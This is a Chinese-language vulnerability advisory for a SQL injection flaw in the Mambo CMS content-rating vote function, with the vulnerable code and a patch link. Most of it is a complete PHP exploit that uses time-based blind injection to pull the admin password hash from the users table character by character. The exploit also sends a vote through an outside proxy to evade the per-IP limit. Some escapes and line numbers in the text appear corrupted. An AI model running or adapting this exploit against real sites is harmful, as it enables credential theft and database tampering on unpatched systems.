发布日期：2005-06-16
更新日期：2005-06-16

受影响系统：
Mambo Mambo Open Source <= 4.5.2.2
不受影响系统：
Mambo Mambo Open Source 4.5.2.3
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 13966

Mambo是一款开放源代码的WEB内容管理系统。

Mambo的com_contents中存在严重的SQL注入漏洞，远程攻击者可能利用此漏洞非法操作数据库。

  -- content.php --

  100             case 'vote':
  101                     recordVote ( $url , $user_rating , $cid , 
$database);
  102                     break;
  ...
  1478                                    $query = "UPDATE 
#__content_rating"
  1479                                    . "/n SET rating_count = 
rating_count + 1,"
  1450                                    . "/n rating_sum = rating_sum 
+ $user_rating,"
  1451                                    . "/n lastip = '$currip'"
  1452                                    . "/n WHERE content_id = ". $cid
  1453                                    ;

  ----------------

在1450行$user_rating未经任何验证便使用用户提供的数据，导致用户可以获得敏感信息。

<*来源：pokley （saleh@scan-associates.net）
        al3ndaleeb （al3ndaleeb@uk2.net）
 
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=111885974124936&w=2
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

*/

if (!(function_exists('curl_init'))) {
    echo "cURL extension required/n";
    exit;
}

ini_set("max_execution_time","999999");

$benchcount = 150000;
$aid= 62;
$cid = 2;
$charmap = array (48,49,50,51,52,53,54,55,56,57,
          97,98,99,100,101,102,
          103,104,105,
          106,107,108,109,110,111,112,113,
          114,115,116,117,118,119,120,121,122
          );
         
if($argv[1]){   
    $url = $argv[1];
    if ($argv[2])
        $aid = $argv[2];
    if ($argv[3])
        $benchcount = $argv[3];
    if ($argv[4])
        $proxy = $argv[4];
}
else {
    echo "Usage: ".$argv[0]." <URL> [userid] [benchmarkcount] [proxy]/n/n";
    echo "/tURL/t URL to mambo site (ex: http://127.0.0.1)/n";
    echo "/taid/t userid to get  (default: 62 (admin))/n";
    echo "/tbenchmarkcount/t benchmark count  (default: 150000)/n";
    echo "/tproxy/t optional proxy url  (ex: http://10.10.10.10:8080)/n";
    exit;
}

// rate from different ip (using http://projectbypass.com)

$projectbypass = "http://projectbypass.com/nph-proxy3.cgi/010110A/";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$projectbypass.str_replace("://","/",$url)."/index.php?op /
tion=com_content&task=vote&id=1&Itemid=1&cid=$cid&user_rating=1"); curl_setopt($ch, /
CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch);
curl_close ($ch);

// standard page loading time
$start = time();
$ch = curl_init();
if ($proxy){
    curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res  = curl_exec($ch);
curl_close ($ch);
$stop = time();
$sloadtime = floatval($stop - $start);
echo "standard page loading =".$sloadtime."/n";

// benchmark page loading time
$start = time();
$ch = curl_init();
if ($proxy){
    curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Itemid /
=1&cid=$cid&user_rating=1,rating_sum=(select+1+from+mos_users+where+if(2>1,benchmark($ /
benchcount,md5(1)),1))+where+content_id=$cid/*"); curl_setopt($ch, /
CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch);
curl_close ($ch);
$stop = time();
$bloadtime = floatval($stop - $start);
echo "bencmark page loading =".$bloadtime."/n";

// check if SQL query failed
if (ereg("DB function failed",$res)){
    echo "[x] mysql < 4.1 detected - not exploitable/n";
    exit();
}

if ($bloadtime <= $sloadtime + 2){
    echo "[x] increase your benchmark count/n";
    exit();
}

echo "Take your time for Teh Tarik... please wait .../n/n";
echo "Result:/n";
echo "/tUserid = $aid/n";
echo "/tPassword Hash = ";

// starting fetch password

$benchcount = $benchcount*2;
       
for($i= 1;$i< 33;$i++){
    foreach ($charmap as $char){
        $start = time();
        echo chr($char);
        $ch = curl_init();
        if ($proxy){
            curl_setopt($ch, CURLOPT_PROXY,$proxy);
        }
        curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Item /
id=1&cid=$cid&user_rating=1,rating_sum=(select+password+from+mos_users+where+id=$aid+a /
nd+if(ascii(substring(password,$i,1))=$char,benchmark($benchcount,md5(1)),1))+where+co /
ntent_id=$cid/*");  curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
        $res=curl_exec ($ch);
        curl_close ($ch);
        $stop = time();
        $xloadtime = floatval($stop - $start);
        if (floatval($xloadtime) > $bloadtime){
            $hash .= chr($char);
            break 1;
        }
        else {
            echo chr(8);
        }
       
        if ($char == 103){
            echo "/n/n/tNot Vulnerable or Something wrong occur .../n";
            exit;
        }
       
    }
}
echo "/n";

?>

建议：
--------------------------------------------------------------------------------
厂商补丁：

Mambo
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载4.5.2.3版本：

http://mamboforge.net/frs/download.php/6151/MamboV4.5.2.3-stable.tar.gz